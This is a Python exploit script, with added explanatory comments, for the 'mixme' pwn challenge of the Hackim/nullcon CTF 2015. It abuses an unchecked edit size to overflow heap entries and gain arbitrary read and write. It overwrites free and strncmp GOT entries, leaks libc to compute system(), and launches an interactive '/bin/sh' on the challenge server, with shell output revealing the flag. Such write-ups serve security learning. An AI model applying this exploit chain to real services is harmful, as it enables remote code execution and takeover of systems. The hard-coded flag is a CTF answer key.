Hackim/nullcon CTF 2015 - mixme exploiting 400 points
#!/usr/bin/env python
from nulllife import *
import sys, time
# www.null-life.com
# write-up / exploit by @_g05u_
# Hackim/nullcon CTF 2015 - mixme exploiting 400 points
# Flag: aw3s0m3++_hipp1e_pwn_r0ckst4r
# Counter for single-character entry names. Starts at 'a' (0x61) and is
# advanced by write_arbitrary/read_arbitrary so every scratch entry they
# create gets a name not used before.
c = 0x61
# Connection to the challenge service (nulllife socket wrapper; the script
# uses its readuntil/writeline/write/read/interactive methods).
s = NullSocket("54.163.248.69", 9005)
def store(name, size, data):
    """Drive the service's "store" menu op: create a new entry.

    Answers the "Name: ", "Size: " and "Enter data: " prompts in that order.
    `size` is sent as its decimal string; `data` goes through writeline
    (presumably newline-terminated, unlike the raw write used by edit).
    Uses the module-level socket `s`. The menu prompt that follows
    ("exit): ") is not consumed here -- callers read it themselves.
    Returns None.
    """
    s.writeline("store")
    s.readuntil("Name: ")
    s.writeline(name)
    s.readuntil("Size: ")
    s.writeline(str(size))
    s.readuntil("Enter data: ")
    s.writeline(data)
def edit(name, size, data):
    """Drive the service's "edit" menu op: replace an entry's contents.

    Answers the "Name: " and "Size: " prompts, then sends `data` after the
    "new data: " prompt. Note the payload is sent with write rather than
    writeline -- presumably so no newline is appended to raw bytes such as
    packed addresses. `size` is whatever the caller supplies; nothing here
    ties it to the entry's original allocation. Uses the module-level
    socket `s`; the trailing "exit): " prompt is left for the caller.
    Returns None.
    """
    s.writeline("edit")
    s.readuntil("Name: ")
    s.writeline(name)
    s.readuntil("Size: ")
    s.writeline(str(size))
    s.readuntil("new data: ")
    s.write(data)
def get(name, size):
    """Drive the service's "get" menu op and return the bytes it sends back.

    Answers the "Name: " and "Size: " prompts, then reads `size` bytes from
    the module-level socket `s` and returns them. Whether s.read can return
    fewer than `size` bytes depends on the nulllife wrapper -- not visible
    here. The trailing "exit): " prompt is left for the caller.
    """
    s.writeline("get")
    s.readuntil("Name: ")
    s.writeline(name)
    s.readuntil("Size: ")
    s.writeline(str(size))
    return s.read(size)
def write_arbitrary(addr, size, data):
    """Write `data` (`size` bytes) to address `addr` in the target process.

    Creates two fresh 1-byte entries named chr(c) and chr(c+1) (each holding
    its own name with the case bit flipped), then edits the FIRST of them
    with a 40-byte payload -- far larger than its 1-byte allocation. The
    payload layout ("A"*16, "PWNT", three zero words, "DDDD", pack(addr))
    presumably overlays the second entry's record, renaming it "PWNT" and
    pointing its data at `addr`; the field offsets are inferred from the
    payload only, confirm against the binary. A final edit of "PWNT" then
    lands `data` at `addr`.

    Root cause this relies on (inferred): edit honours a caller-supplied
    size rather than the entry's stored size; a server-side check against
    the stored allocation would stop the overflow. Advances global `c` by
    two. Returns the result of edit (None).
    """
    global c
    store(chr(c), 1, chr(c ^ 0x20))
    s.readuntil("exit): ")
    c += 1
    store(chr(c), 1, chr(c ^ 0x20))
    c += 1
    s.readuntil("exit): ")
    # Overflowing edit of the first scratch entry (chr(c - 2)); the 40 bytes
    # are laid out to reach the neighbouring entry's name and data pointer.
    edit(chr(c - 2), 40, "A" * 16 + "PWNT" + pack(0) * 3 + "DDDD" + pack(addr))
    s.readuntil("exit): ")
    return edit("PWNT", size, data)
def read_arbitrary(addr, size):
    """Read `size` bytes from address `addr` in the target process.

    Same set-up as write_arbitrary: two fresh 1-byte entries, then an
    over-long (40-byte) edit of the first whose payload presumably overlays
    the second entry's record, renaming it "LEAK" and pointing its data at
    `addr` (offsets inferred from the payload; confirm against the binary).
    A get of "LEAK" then returns the bytes at `addr`.

    Advances global `c` by two. Returns whatever get returns (the raw bytes
    read from the socket).
    """
    global c
    store(chr(c), 1, chr(c ^ 0x20))
    s.readuntil("exit): ")
    c += 1
    store(chr(c), 1, chr(c ^ 0x20))
    c += 1
    s.readuntil("exit): ")
    # Overflowing edit of the first scratch entry (chr(c - 2)), mirroring
    # write_arbitrary but with the "LEAK" name.
    edit(chr(c - 2), 40, "A" * 16 + "LEAK" + pack(0) * 3 + "DDDD" + pack(addr))
    s.readuntil("exit): ")
    return get("LEAK", size)
# Fixed addresses taken from the challenge binary. They can be hard-coded
# only because the binary is loaded at a fixed base (0x0804xxxx); PIE/ASLR
# on the binary or full RELRO (read-only GOT) would break the chain below.
ret = 0x08048D3C        # written over free@got; presumably a `ret` gadget so free() returns immediately -- confirm in the binary
write_got = 0x0804B048
free_got = 0x0804B020
strncmp_got = 0x0804B058
# Offsets of write and system from the remote libc base. Per the original
# notes: the write-to-base offset was brute-forced with read_arbitrary and
# the libc downloaded to obtain these values.
offset_write = 0xdb530
offset_system = 0x40100
s.readuntil("exit): ")
print 'Overwrite free_got'
# Step 1: point free@got at `ret` (presumably so later frees of the
# corrupted entries do nothing instead of crashing).
write_arbitrary(free_got, 4, pack(ret))
print 'Read write got'
# Step 2: leak write's resolved libc address from the GOT. The "<I" unpack
# shows the leak is treated as a 32-bit little-endian word; pack() from
# nulllife is presumably the matching packer -- verify.
write_addr = struct.unpack("<I", read_arbitrary(write_got, 4))[0]
# Step 3: rebase from write to system using the libc offsets above.
system_addr = write_addr - offset_write + offset_system
print 'System addr: 0x%08X' % system_addr
print 'Overwrite strncmp_got'
# Step 4: redirect strncmp@got to system; the next menu input is then
# handed to system (presumably via the menu's strncmp on the input line).
write_arbitrary(strncmp_got, 4, pack(system_addr))
s.readuntil("exit): ")
print 'Got shell...'
s.write("/bin/sh -i")
s.interactive()
'''
ls
bin
bin_old
busybox
etc
flag_fix_your_permissions.txt
l
lib
linuxrc
mixme
sbin
srv
usr
Invalid input
Select op (store/get/edit/exit): cat flag_fix_your_permissions.txt
aw3s0m3++_hipp1e_pwn_r0ckst4r
'''